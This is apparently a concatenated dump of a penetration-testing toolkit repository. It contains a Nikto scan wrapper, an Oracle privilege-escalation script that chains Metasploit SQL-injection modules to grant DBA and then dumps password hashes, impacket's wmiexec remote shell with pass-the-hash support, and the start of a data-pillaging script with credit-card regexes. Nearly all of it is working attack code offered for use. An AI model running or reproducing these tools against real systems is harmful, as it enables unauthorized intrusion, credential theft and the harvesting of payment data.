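# Rewrite the telnet and ssh lists without duplicate lines (first occurrence
# wins, order kept).  wordList_http.txt is not deduplicated -- as before.
for wordListPath in ("wordList_telnet.txt", "wordList_ssh.txt"):
    uniqueLines = []
    with open(wordListPath) as f:
        for line in f:
            if line not in uniqueLines:
                uniqueLines.append(line)
    with open(wordListPath, "w") as f:
        f.writelines(uniqueLines)

print "[*] Please check directory for wordList_ssh.txt, wordList_telnet.txt, wordList_http.txt, users.txt and passwords.txt"


# ---- /niktohelper/niktohelper.py ----
#!/usr/bin/env python
import re,sys,os,subprocess,shlex,Queue
from threading import Thread
import urllib2, socket,sys,base64,ssl
from xml.dom.minidom import parse, parseString

niktoPath = "/pentest/nikto-2.1.5/nikto.pl"
# Bing Search API Account Key -- read from the environment so it is never
# committed next to the scan output.  With an empty key the API presumably
# answers with an HTTP error, which parseNmap reports as "check your key".
account_key = os.environ.get('BING_API_KEY', '')
runBing = True

#CA certs http://curl.haxx.se/ca/cacert.pem


class Consumer(Thread):
    """Daemon thread that pops command strings off ``queue`` and runs each to completion."""

    def __init__(self, queue=None):
        super(Consumer, self).__init__()
        self.daemon = True
        self.queue = queue

    def run(self):
        while True:
            cmd = self.queue.get()
            try:
                args = shlex.split(cmd)
                p = subprocess.Popen(args, stdout=subprocess.PIPE)
                # communicate() drains stdout.  The previous wait() on a PIPE
                # nobody read deadlocked once nikto filled the pipe buffer.
                p.communicate()
            except (OSError, ValueError) as e:
                print "[!] Failed to run '%s': %s" % (cmd, e)
            finally:
                # Always acknowledge, or queue.join() in parseNmap never returns.
                self.queue.task_done()


def isOpen(ip, port, timeout=None):
    """Return True when a TCP connect to (ip, port) succeeds.

    ``timeout`` (seconds) is optional; the default keeps the original OS
    connect timeout.  The socket is closed on every path.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if timeout is not None:
        s.settimeout(timeout)
    try:
        s.connect((ip, int(port)))
        s.shutdown(2)
        return True
    except (socket.error, ValueError, TypeError):
        return False
    finally:
        s.close()


def getSSLCommonName(HOST,PORT):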
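# niktohelper.py, continued: body of getSSLCommonName, then bing/parseNmap/options/showhelp.
    """Return the commonName from the certificate on HOST:PORT, or "".

    The certificate is validated against ./cacert.pem (per the ssl docs
    CERT_OPTIONAL behaves like CERT_REQUIRED on a client socket), so a
    self-signed certificate -- common on assessment targets -- yields ""
    rather than its CN.  Connect and SSL failures, a missing cacert.pem and a
    certificate without a CN also yield "": the previous code crashed on
    socket errors and returned None when no CN was present, which callers
    then handed to len().
    """
    sock = None
    try:
        HOST = socket.getaddrinfo(HOST, PORT)[0][4][0]
        sock = socket.socket()
        sock.connect((HOST, PORT))
        sock = ssl.wrap_socket(sock,
                               cert_reqs=ssl.CERT_OPTIONAL,
                               ca_certs="cacert.pem")
        cert = sock.getpeercert()
        for field in cert.get('subject', ()):
            if field[0][0] == 'commonName':
                return field[0][1]
        return ""
    except (ssl.SSLError, socket.error, IOError):
        return ""
    finally:
        if sock is not None:
            sock.close()


def _chooseFromMenu(candidates):
    """Print ``candidates`` numbered from 1, read a selection from stdin and
    return the chosen entries.

    Accepts "all", a comma-separated list of numbers, or blank / "none" for
    nothing.  A token that is not an integer or is out of range is reported
    and skipped; ``int(x)-1`` used to crash the whole run on it and accepted
    negative numbers as Python indices from the end.
    """
    for number, candidate in enumerate(candidates, 1):
        print "("+str(number)+")\t"+candidate
    print "[*] Enter the number followed by comma E.g. 1, 4, 10"
    print "[*] To select all, key in 'ALL'. Leave it blank or key in 'NONE' to ignore all."
    listInput = raw_input().strip().lower()
    if not listInput or listInput == "none":
        return []
    if listInput == "all":
        return list(candidates)
    chosen = []
    for token in listInput.split(","):
        token = token.strip()
        try:
            index = int(token) - 1
        except ValueError:
            index = -1
        if not 0 <= index < len(candidates):
            print "[!] Ignoring invalid selection '%s'" % token
            continue
        print candidates[index]
        chosen.append(candidates[index])
    return chosen


def _bingPage(account_key, ip, top, skip):
    """Fetch one page of Bing 'ip:<ip>' results; return the host[:port] part of each URL.

    urllib2.HTTPError (bad key, quota) propagates to the caller.
    """
    url = "https://api.datamarket.azure.com/Data.ashx/Bing/Search/v1/Web?Query='ip:%s'&$top=%s&$skip=%s&$format=Atom"% (ip,top,skip)
    request = urllib2.Request(url)
    auth = base64.encodestring("%s:%s" % (account_key, account_key)).replace("\n", "")
    request.add_header("Authorization", "Basic %s" % auth)
    res = urllib2.urlopen(request)
    try:
        data = res.read()
    finally:
        res.close()
    xmldoc = parseString(data)
    return [site.childNodes[0].nodeValue.split("/")[2]
            for site in xmldoc.getElementsByTagName('d:Url')]


def _sitesForIp(account_key, ip):
    """Bing reverse lookup for one IP (four pages of 50), letting the operator
    pick the host names to scan; falls back to the certificate CN on 443 when
    nothing was picked.

    The menu is now offered whenever a page has at least one new candidate;
    the original required more than one and silently dropped a lone result.
    """
    sites = []
    skip = 0
    top = 50
    while skip < 200:
        candidates = []
        for domain in _bingPage(account_key, ip, top, skip):
            if domain not in sites and domain not in candidates:
                candidates.append(domain)
        if candidates:
            sites.extend(_chooseFromMenu(candidates))
        skip += 50
    if not sites:
        if isOpen(ip, 443):
            commonName = getSSLCommonName(ip, 443)
            if len(commonName) > 0:
                sites.append(commonName)
    return sites


def bing(account_key, ip):
    """Reverse-lookup ``ip`` -- a string, or a list of strings -- via Bing and
    return the selected host names (None for any other type, as before).

    For a list the results of every entry are concatenated.  The original
    list branch appears to have returned after the first entry, and its
    certificate fallback apparently probed the menu counter that had
    overwritten ``count`` instead of the IP.
    """
    if isinstance(ip, list):
        sites = []
        for entry in ip:
            sites.extend(_sitesForIp(account_key, entry.strip()))
        return sites
    elif isinstance(ip, str):
        return _sitesForIp(account_key, ip)


def _niktoCommand(host, portNo, useSsl, savePath, vhost=None):
    """Assemble the nikto command line exactly as the original four variants did."""
    parts = ["/usr/bin/perl", niktoPath]
    if vhost:
        parts += ["-vhost", vhost]
    parts += ["-maxtime", "7200", "-Cgidirs", "all"]
    if useSsl:
        parts.append("-ssl")
    parts += ["-host", host, "-port", portNo, "-output", savePath]
    return " ".join(parts)


# Host-name characters only (':' allowed for the host:port form Bing returns).
_SAFE_NAME = re.compile(r'^[A-Za-z0-9._:-]+$')


def _queueScans(queue, host, portString, site=None):
    """Queue one nikto run per open http / ssl|http entry of a gnmap ``Ports:`` string."""
    currentDir = os.getcwd()
    for port in portString.split(","):
        portNo = port.split("/")[0].strip()
        if "open" not in port:
            continue
        if "ssl|http" in port:
            useSsl = True
        elif "http" in port:
            useSsl = False
        else:
            continue
        if site:
            savePath = currentDir+"/nikto-"+host+"-port"+portNo+"-"+site+".txt"
        else:
            savePath = currentDir+"/nikto-"+host+"-port"+portNo+".txt"
        cmd = _niktoCommand(host, portNo, useSsl, savePath, site)
        print cmd
        queue.put(cmd)


def parseNmap(fname, child, displayOnly):
    """Read a .gnmap file, queue a nikto command for every open http/https
    port (once per Bing-discovered vhost when ``runBing``), and unless
    ``displayOnly`` run them on ``child`` Consumer threads until the queue
    drains."""
    queue = Queue.Queue()
    ipList = []
    with open(fname) as f:
        content = f.readlines()
    for lineNo, i in enumerate(content, 1):
        if lineNo <= 2:  # first two lines skipped, as before
            continue
        i = i.strip()
        if 'http' not in i or 'Ports: ' not in i:
            continue
        # A gnmap host line reads "Host: 10.0.0.5 (name)  Ports: ...".  The old
        # pattern 'Host:(.*)\(\)' only matched an *empty* reverse name and
        # raised AttributeError on any host that has one.
        result = re.search(r'Host:\s*(\S+)', i)
        if result is None:
            continue
        host = result.group(1).strip()
        if host in ipList:
            continue
        ipList.append(host)
        portString = i[i.index('Ports: ')+7:]
        # Perform a reverse DNS lookup on Bing.com
        sites = []
        if runBing==True:
            try:
                sites = bing(account_key, host)
            except urllib2.HTTPError:
                print "[*] Please check your Bing API Key"
                sys.exit(0)
        if len(sites)>0:
            for site in sites:
                # ``site`` comes from Bing results or a certificate CN -- data
                # the target controls.  It is spliced into the nikto command
                # line (split by shlex in Consumer) and into the output file
                # name, so anything beyond host-name characters is refused: a
                # CN such as "../x" or "a -Plugins ..." would otherwise walk
                # the output path or inject nikto options.
                if not _SAFE_NAME.match(site):
                    print "[!] Skipping vhost with unsafe characters: %r" % site
                    continue
                _queueScans(queue, host, portString, site)
        else:
            _queueScans(queue, host, portString)
    if displayOnly==False:
        for i in range(int(child)):
            consumer = Consumer(queue)
            consumer.start()
        queue.join()


def options(arguments):
    """Parse the hand-rolled argv: -child N, -file PATH, -nobing, -display; then run parseNmap."""
    global runBing
    child = 0
    displayOnly = False
    filename = ""
    for count, arg in enumerate(arguments):
        if arg == "-child" and count + 1 < len(arguments):
            child = arguments[count+1]
        if arg == "-file" and count + 1 < len(arguments):
            filename = arguments[count+1]
        if arg == "-nobing":
            runBing = False
        if arg == "-display":
            displayOnly = True
    # With zero consumers queue.join() in parseNmap waits forever on a queue
    # nobody drains, so a missing or zero -child means one thread.
    if int(child) < 1:
        child = 1
    print filename
    parseNmap(filename,child,displayOnly)


def showhelp():
    print """
#####################################################
# niktoHelper.py #
# Run Nikto against http/https services in .gnmap #
# visit milo2012.wordpress.com #
#####################################################
Usage: python niktoHelper.py [OPTIONS]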
| 263 | [OPTIONS] 264 | 265 | -file [Nmap .gnmap File] 266 | -child [Num of Threads] 267 | -nobing [Do not run Bing reverse IP] 268 | -display[Print only to screen. Do not run Nikto] 269 | """ 270 | 271 | if __name__ == '__main__': 272 | if len(sys.argv) <= 2: 273 | showhelp() 274 | sys.exit() 275 | else: 276 | options(sys.argv) 277 | -------------------------------------------------------------------------------- /oracle_pillage/ora_priv.py: -------------------------------------------------------------------------------- 1 | import time 2 | import sys 3 | import csv 4 | import re 5 | import argparse 6 | import urllib 7 | import os.path 8 | import fileinput 9 | import subprocess 10 | import socket 11 | import os 12 | import itertools 13 | from collections import defaultdict 14 | from pprint import pprint 15 | from termcolor import colored 16 | from subprocess import call 17 | 18 | sid = "" 19 | metasploitPath = "" 20 | #metasploitPath = "/pentest/metasploit-framework/" 21 | 22 | # Made by Keith Lee 23 | # http://milo2012.wordpress.com 24 | # @keith55 25 | 26 | try: 27 | import cx_Oracle 28 | except ImportError: 29 | print "[!] 
Please install cx_Oracle" 30 | sys.exit() 31 | 32 | def msfPrivEscUnknown(username,password,hostname,sid): 33 | outputMsfFile = "msfresource.rc" 34 | myfile = open(outputMsfFile, "w") 35 | 36 | stmt = "setg DBUSER "+username+"\n" 37 | stmt += "setg DBPASS "+password+"\n" 38 | stmt += "setg SQL grant dba to "+username+"\n" 39 | stmt += "setg SID "+sid+"\n" 40 | stmt += "setg RHOST "+hostname+"\n" 41 | myfile.write(stmt) 42 | 43 | #Last Attempts 44 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish2\n") 45 | myfile.write("exploit\n") 46 | myfile.write("sleep 3\n") 47 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish3\n") 48 | myfile.write("exploit\n") 49 | myfile.write("sleep 3\n") 50 | myfile.write("use auxiliary/sqli/oracle/dbms_metadata_get_granted_xml\n") 51 | myfile.write("exploit\n") 52 | myfile.write("sleep 3\n") 53 | myfile.write("use auxiliary/sqli/oracle/dbms_metadata_get_xml\n") 54 | myfile.write("exploit\n") 55 | myfile.write("sleep 3\n") 56 | myfile.write("use auxiliary/sqli/oracle/dbms_metadata_open\n") 57 | myfile.write("exploit\n") 58 | myfile.write("sleep 3\n") 59 | myfile.write("use auxiliary/sqli/oracle/droptable_trigger\n") 60 | myfile.write("exploit\n") 61 | myfile.write("sleep 3\n") 62 | myfile.write("use auxiliary/sqli/oracle/lt_compressworkspace\n") 63 | myfile.write("exploit\n") 64 | myfile.write("sleep 3\n") 65 | myfile.write("use auxiliary/sqli/oracle/lt_mergeworkspace\n") 66 | myfile.write("exploit\n") 67 | myfile.write("sleep 3\n") 68 | myfile.write("use auxiliary/sqli/oracle/lt_removeworkspace\n") 69 | myfile.write("exploit\n") 70 | myfile.write("sleep 3\n") 71 | myfile.write("use auxiliary/sqli/oracle/lt_rollbackworkspace\n") 72 | myfile.write("exploit\n") 73 | myfile.write("sleep 3\n") 74 | myfile.write("exit\n") 75 | myfile.close() 76 | command = metasploitPath+"msfconsole -r "+os.getcwd()+"/msfresource.rc" 77 | print command 78 | call(command, shell=True) 79 | 80 | def msfPrivEsc(username,password,hostname,sid): 81 | 
#Check version before doing privilege escalation 82 | """ 83 | orcl1 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 84 | curs = orcl1.cursor() 85 | curs.execute("select * from v$version") 86 | row = curs.fetchone() 87 | curs.close() 88 | oracleVer = str(row) 89 | """ 90 | oracleVer = "10.1" 91 | 92 | outputMsfFile = "msfresource.rc" 93 | myfile = open(outputMsfFile, "w") 94 | 95 | stmt = "setg DBUSER "+username+"\n" 96 | stmt += "setg DBPASS "+password+"\n" 97 | stmt += "setg SQL grant dba to "+username+"\n" 98 | stmt += "setg SID "+sid+"\n" 99 | stmt += "setg RHOST "+hostname+"\n" 100 | 101 | myfile.write(stmt) 102 | 103 | #if "9.0" in str(row) or "10.1" in str(row) or "10.2" in str(row): 104 | if "9.0" in oracleVer: 105 | myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n") 106 | myfile.write("exploit\n") 107 | myfile.write("sleep 3\n") 108 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n") 109 | myfile.write("exploit\n") 110 | myfile.write("sleep 3\n") 111 | 112 | if "9.0" in oracleVer: 113 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n") 114 | myfile.write("exploit\n") 115 | myfile.write("sleep 3\n") 116 | 117 | if "10.1" in oracleVer: 118 | myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n") 119 | myfile.write("exploit\n") 120 | myfile.write("sleep 3\n") 121 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n") 122 | myfile.write("sleep 3\n") 123 | myfile.write("exploit\n") 124 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n") 125 | myfile.write("exploit\n") 126 | myfile.write("sleep 3\n") 127 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n") 128 | myfile.write("sleep 3\n") 129 | myfile.write("exploit\n") 130 | myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") 131 | myfile.write("sleep 3\n") 132 | myfile.write("exploit\n") 133 | 134 | if "10.2" in oracleVer: 135 | 
myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n") 136 | myfile.write("sleep 3\n") 137 | myfile.write("exploit\n") 138 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n") 139 | myfile.write("sleep 3\n") 140 | myfile.write("exploit\n") 141 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n") 142 | myfile.write("sleep 3\n") 143 | myfile.write("exploit\n") 144 | myfile.write("use auxiliary/sqli/oracle/jvm_os_code_10g\n") 145 | myfile.write("sleep 3\n") 146 | myfile.write("exploit\n") 147 | 148 | if "11.0" in oracleVer: 149 | myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") 150 | myfile.write("sleep 3\n") 151 | myfile.write("exploit\n") 152 | 153 | if "11.1" in oracleVer: 154 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n") 155 | myfile.write("sleep 3\n") 156 | myfile.write("exploit\n") 157 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n") 158 | myfile.write("sleep 3\n") 159 | myfile.write("exploit\n") 160 | myfile.write("use auxiliary/sqli/oracle/jvm_os_code_10g\n") 161 | myfile.write("sleep 3\n") 162 | myfile.write("exploit\n") 163 | myfile.write("use auxiliary/sqli/oracle/jvm_os_code_11g\n") 164 | myfile.write("sleep 3\n") 165 | myfile.write("exploit\n") 166 | myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") 167 | myfile.write("sleep 3\n") 168 | myfile.write("exploit\n") 169 | 170 | if "11.2" in oracleVer: 171 | myfile.write("use auxiliary/sqli/oracle/jvm_os_code_11g\n") 172 | myfile.write("sleep 3\n") 173 | myfile.write("exploit\n") 174 | myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") 175 | myfile.write("sleep 3\n") 176 | myfile.write("exploit\n") 177 | myfile.write("exit\n") 178 | myfile.close() 179 | command = metasploitPath+"msfconsole -r "+os.getcwd()+"/msfresource.rc" 180 | print command 181 | call(command, shell=True) 182 | 183 | def dumpHashes(username,password,hostname,sid): 184 | orcl = 
cx_Oracle.connect(username+'/'+password+'@'+hostname+':1521/'+sid) 185 | curs = orcl.cursor() 186 | curs.execute("SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'") 187 | test1 = curs.fetchall() 188 | print colored("\n[+] Below are the password hashes for SID: "+sid+".","red",attrs=['bold']) 189 | for i in test1: 190 | print i 191 | curs.close() 192 | 193 | def checkPermissions(username,password,hostname,sid,firstRun): 194 | try: 195 | orcl = cx_Oracle.connect(username+'/'+password+'@'+hostname+':1521/'+sid) 196 | curs = orcl.cursor() 197 | curs.execute("select * from v$database") #Get a list of all databases 198 | curs.close() 199 | print colored(str("[+] ["+sid+"]"+" Testing: "+username.strip()+"/"+password.strip()+". (Success)"),"red",attrs=['bold']) 200 | dumpHashes(username,password,hostname,sid) 201 | return True 202 | except cx_Oracle.DatabaseError as e: 203 | error, = e.args 204 | if error.code == 1017: 205 | print "[-] Testing: "+username.strip()+"/"+password.strip()+". (Fail)" 206 | sys.exit() 207 | if error.code == 942: 208 | if firstRun==True: 209 | print colored("[+] ["+sid+"]"+" Testing: "+username.strip()+"/"+password.strip()+". (Insufficient Privileges). 
Trying to escalate privileges.","red",attrs=['bold']) 210 | return False 211 | 212 | if __name__=="__main__": 213 | parser = argparse.ArgumentParser(description='Oracle Privilege Escalation') 214 | parser.add_argument('-host', help='IP or host name of Oracle server') 215 | parser.add_argument('-hostFile', dest='hostFile', help='File containing IP addresses of oracle servers') 216 | parser.add_argument('-u', dest='username', help='Use this username to authenticate') 217 | parser.add_argument('-p', dest='password', help='Use this password to authenticate') 218 | parser.add_argument('-sid', dest='sid', help='Use this sid') 219 | args = vars(parser.parse_args()) 220 | 221 | hostList = [] 222 | counter=0 223 | 224 | if args['host']!=None: 225 | counter+=1 226 | 227 | if args['hostFile']!=None: 228 | counter+=1 229 | 230 | if args['hostFile']!=None and args['host']==None: 231 | for line in open(args['hostFile'],'r'): 232 | hostList.append(line.strip()) 233 | 234 | if args['host']!=None and args['hostFile']==None: 235 | hostList.append(args['host']) 236 | 237 | if counter==0 or counter>1: 238 | print colored("[+] Please use either -host or -hostFile.","red",attrs=['bold']) 239 | sys.exit(0) 240 | 241 | if args['sid']!=None: 242 | sid = args['sid'] 243 | 244 | #Check if username/password is provided in the command line 245 | credCount=0 246 | 247 | if args['username']!=None: 248 | credCount+=1 249 | if args['password']!=None: 250 | credCount+=1 251 | if credCount>1 and credCount<2: 252 | print "[!] You need to provide both -u and -p." 
253 | sys.exit(0) 254 | 255 | #Load hostname 256 | for hostname in hostList: 257 | if len(hostname)<1: 258 | sys.exit(0) 259 | 260 | socketAvail = False 261 | try: 262 | socket.setdefaulttimeout(2) 263 | s = socket.socket() 264 | s.connect((hostname,1521)) 265 | socketAvail=True 266 | print "[+] Connected to "+hostname+":1521" 267 | except: 268 | print "[-] Cannot connect to "+hostname+":1521" 269 | 270 | if socketAvail==True: 271 | username = args['username'] 272 | password = args['password'] 273 | print "[+] [SID:"+sid+"] Testing accounts. " 274 | if checkPermissions(username,password,hostname,sid,firstRun=True)==False: 275 | print colored("[+] Attempting Metasploit Oracle SQL Privilege Escalation","red",attrs=['bold']) 276 | msfPrivEsc(username,password,hostname,sid) 277 | if checkPermissions(username,password,hostname,sid,firstRun=False)==False: 278 | print colored("[+] Attempting Addition Oracle SQL Privilege Escalation","red",attrs=['bold']) 279 | msfPrivEscUnknown(username,password,hostname,sid) 280 | if checkPermissions(username,password,hostname,sid,firstRun=False)==False: 281 | print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Unable to Escalate to DBA)","red",attrs=['bold']) 282 | else: 283 | print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold']) 284 | else: 285 | print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold']) 286 | else: 287 | print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". 
(Successfully escalated to DBA)","red",attrs=['bold']) 288 | -------------------------------------------------------------------------------- /impacket/wmiexec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Copyright (c) 2003-2014 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # $Id$ 9 | # 10 | # A similar approach to smbexec but executing commands through WMI. 11 | # Main advantage here is it runs under the user (has to be Admin) 12 | # account, not SYSTEM, plus, it doesn't generate noisy messages 13 | # in the event log that smbexec.py does when creating a service. 14 | # Drawback is it needs DCOM, hence, I have to be able to access 15 | # DCOM ports at the target machine. 16 | # 17 | # Author: 18 | # beto (bethus@gmail.com) 19 | # 20 | # Reference for: 21 | # DCOM 22 | # 23 | 24 | import sys 25 | import os 26 | import cmd 27 | import argparse 28 | import time 29 | import ntpath 30 | 31 | from impacket import version, ntlm 32 | from impacket.smbconnection import * 33 | from impacket.dcerpc.v5.dcomrt import DCOMConnection 34 | from impacket.dcerpc.v5.dcom import wmi 35 | from impacket.dcerpc.v5.dtypes import NULL 36 | 37 | OUTPUT_FILENAME = '__' 38 | 39 | 40 | class WMIEXEC: 41 | def __init__(self, command='', username='', password='', domain='', hashes=None, share=None, noOutput=False): 42 | self.__command = command 43 | self.__username = username 44 | self.__password = password 45 | self.__domain = domain 46 | self.__lmhash = '' 47 | self.__nthash = '' 48 | self.__share = share 49 | self.__noOutput = noOutput 50 | if hashes is not None: 51 | self.__lmhash, self.__nthash = hashes.split(':') 52 | 53 | def run(self, addr): 54 | if self.__noOutput is False: 55 | smbConnection = SMBConnection(addr, addr) 56 | 
smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) 57 | dialect = smbConnection.getDialect() 58 | if dialect == SMB_DIALECT: 59 | print("[*] SMBv1 dialect used") 60 | elif dialect == SMB2_DIALECT_002: 61 | print("[*] SMBv2.0 dialect used") 62 | elif dialect == SMB2_DIALECT_21: 63 | print("[*] SMBv2.1 dialect used") 64 | else: 65 | print("[*] SMBv3.0 dialect used") 66 | else: 67 | smbConnection = None 68 | 69 | dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, oxidResolver=True) 70 | 71 | iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login) 72 | iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) 73 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 74 | iWbemLevel1Login.RemRelease() 75 | 76 | win32Process, _ = iWbemServices.GetObject('Win32_Process') 77 | 78 | try: 79 | self.shell = RemoteShell(self.__share, win32Process, smbConnection) 80 | if self.__command != ' ': 81 | self.shell.onecmd(self.__command) 82 | else: 83 | self.shell.cmdloop() 84 | except (Exception, KeyboardInterrupt), e: 85 | #import traceback 86 | #traceback.print_exc() 87 | print e 88 | if smbConnection is not None: 89 | smbConnection.logoff() 90 | dcom.disconnect() 91 | sys.stdout.flush() 92 | sys.exit(1) 93 | 94 | if smbConnection is not None: 95 | smbConnection.logoff() 96 | dcom.disconnect() 97 | 98 | 99 | class RemoteShell(cmd.Cmd): 100 | def __init__(self, share, win32Process, smbConnection): 101 | cmd.Cmd.__init__(self) 102 | self.__share = share 103 | self.__output = '\\' + OUTPUT_FILENAME 104 | self.__outputBuffer = '' 105 | self.__shell = 'cmd.exe /Q /c ' 106 | self.__win32Process = win32Process 107 | self.__transferClient = smbConnection 108 | self.__pwd = 'C:\\' 109 | self.__noOutput = False 110 | self.intro = '[!] 
Launching semi-interactive shell - Careful what you execute' 111 | 112 | # We don't wanna deal with timeouts from now on. 113 | if self.__transferClient is not None: 114 | self.__transferClient.setTimeout(100000) 115 | self.do_cd('\\') 116 | else: 117 | self.__noOutput = True 118 | 119 | def do_shell(self, s): 120 | os.system(s) 121 | 122 | def do_exit(self, s): 123 | return True 124 | 125 | def emptyline(self): 126 | return False 127 | 128 | def do_cd(self, s): 129 | self.execute_remote('cd ' + s) 130 | if len(self.__outputBuffer.strip('\r\n')) > 0: 131 | print self.__outputBuffer 132 | self.__outputBuffer = '' 133 | else: 134 | self.__pwd = ntpath.normpath(ntpath.join(self.__pwd, s)) 135 | self.execute_remote('cd ') 136 | self.__pwd = self.__outputBuffer.strip('\r\n') 137 | self.prompt = self.__pwd + '>' 138 | self.__outputBuffer = '' 139 | 140 | def default(self, line): 141 | # Let's try to guess if the user is trying to change drive 142 | if len(line) == 2 and line[1] == ':': 143 | # Execute the command and see if the drive is valid 144 | self.execute_remote(line) 145 | if len(self.__outputBuffer.strip('\r\n')) > 0: 146 | # Something went wrong 147 | print self.__outputBuffer 148 | self.__outputBuffer = '' 149 | else: 150 | # Drive valid, now we should get the current path 151 | self.__pwd = line 152 | self.execute_remote('cd ') 153 | self.__pwd = self.__outputBuffer.strip('\r\n') 154 | self.prompt = self.__pwd + '>' 155 | self.__outputBuffer = '' 156 | else: 157 | if line != '': 158 | self.send_data(line) 159 | 160 | def get_output(self): 161 | def output_callback(data): 162 | self.__outputBuffer += data 163 | 164 | if self.__noOutput is True: 165 | self.__outputBuffer = '' 166 | return 167 | 168 | while True: 169 | try: 170 | self.__transferClient.getFile(self.__share, self.__output, output_callback) 171 | break 172 | except Exception, e: 173 | if str(e).find('STATUS_SHARING_VIOLATION') >= 0: 174 | # Output not finished, let's wait 175 | time.sleep(1) 176 | 
pass 177 | else: 178 | #print str(e) 179 | pass 180 | self.__transferClient.deleteFile(self.__share, self.__output) 181 | 182 | def execute_remote(self, data): 183 | command = self.__shell + data 184 | if self.__noOutput is False: 185 | command += ' 1> ' + '\\\\127.0.0.1\\%s' % self.__share + self.__output + ' 2>&1' 186 | obj = self.__win32Process.Create(command, self.__pwd, None) 187 | self.get_output() 188 | 189 | def send_data(self, data): 190 | self.execute_remote(data) 191 | print self.__outputBuffer 192 | self.__outputBuffer = '' 193 | 194 | 195 | # Process command-line arguments. 196 | if __name__ == '__main__': 197 | print version.BANNER 198 | 199 | parser = argparse.ArgumentParser() 200 | 201 | #parser.add_argument('target', action='store', help='[domain/][username[:password]@]
') 202 | parser.add_argument('-d', action='store', help='[domain]') 203 | parser.add_argument('-u', action='store', help='[username]') 204 | parser.add_argument('-p', action='store', help='[password]') 205 | parser.add_argument('-ip', action='store', help='[ip address]') 206 | parser.add_argument('-f', action='store', help='[file containg list of IP addresses]') 207 | parser.add_argument('-share', action='store', default='ADMIN$', help='share where the output will be grabbed from (default ADMIN$)') 208 | parser.add_argument('-nooutput', action='store_true', default=False, help='whether or not to print the output (no SMB connection created)') 209 | 210 | parser.add_argument('-command', action='store', help='command to execute at the target. If empty it will launch a semi-interactive shell') 211 | #parser.add_argument('command', nargs='*', default = ' ', help='command to execute at the target. If empty it will launch a semi-interactive shell') 212 | 213 | group = parser.add_argument_group('authentication') 214 | 215 | group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') 216 | 217 | if len(sys.argv) == 1: 218 | parser.print_help() 219 | sys.exit(1) 220 | 221 | options = parser.parse_args() 222 | 223 | if options.command == ' ' and options.nooutput is True: 224 | print "[-] Error: -nooutput switch and interactive shell not supported" 225 | sys.exit(1) 226 | 227 | addList = [] 228 | 229 | if options.f: 230 | inp = open(options.f, "r") 231 | for line in inp.readlines(): 232 | addList.append(line.rstrip()) 233 | for address in addList: 234 | print "[*] Running command on %s..." 
% address 235 | username = options.u 236 | password = options.p 237 | try: 238 | if options.d is None: 239 | domain = '' 240 | else: 241 | domain = options.d 242 | if password == '' and username != '' and options.hashes is None: 243 | from getpass import getpass 244 | password = getpass("Password:") 245 | 246 | executer = WMIEXEC(options.command, username, password, domain, options.hashes, options.share, options.nooutput) 247 | executer.run(address) 248 | except (Exception, KeyboardInterrupt) as e: 249 | #import traceback 250 | #print traceback.print_exc() 251 | print '\n[-] Error: %s' % e 252 | sys.exit(0) 253 | 254 | else: 255 | username = options.u 256 | password = options.p 257 | address = options.ip 258 | try: 259 | if options.d is None: 260 | domain = '' 261 | else: 262 | domain = options.d 263 | if password == '' and username != '' and options.hashes is None: 264 | from getpass import getpass 265 | password = getpass("Password:") 266 | 267 | executer = WMIEXEC(options.command, username, password, domain, options.hashes, options.share, options.nooutput) 268 | executer.run(address) 269 | except (Exception, KeyboardInterrupt) as e: 270 | #import traceback 271 | #print traceback.print_exc() 272 | print '\n[-] Error: %s' % e 273 | sys.exit(0) 274 | -------------------------------------------------------------------------------- /oracle_pillage/ora_pillage.py: -------------------------------------------------------------------------------- 1 | import cx_Oracle 2 | import time 3 | import sys 4 | import csv 5 | import re 6 | import argparse 7 | import urllib 8 | import os.path 9 | import fileinput 10 | import subprocess 11 | import socket 12 | import os 13 | import itertools 14 | from collections import defaultdict 15 | from pprint import pprint 16 | from termcolor import colored 17 | 18 | #http://hivelocity.dl.sourceforge.net/project/cx-oracle/5.1.1/cx_Oracle-5.1.1.tar.gz 19 | outputFileCSV="" 20 | ccRegex = [] 21 | ccRegex.append("^4[0-9]{12}(?:[0-9]{3})?$") #Visa 
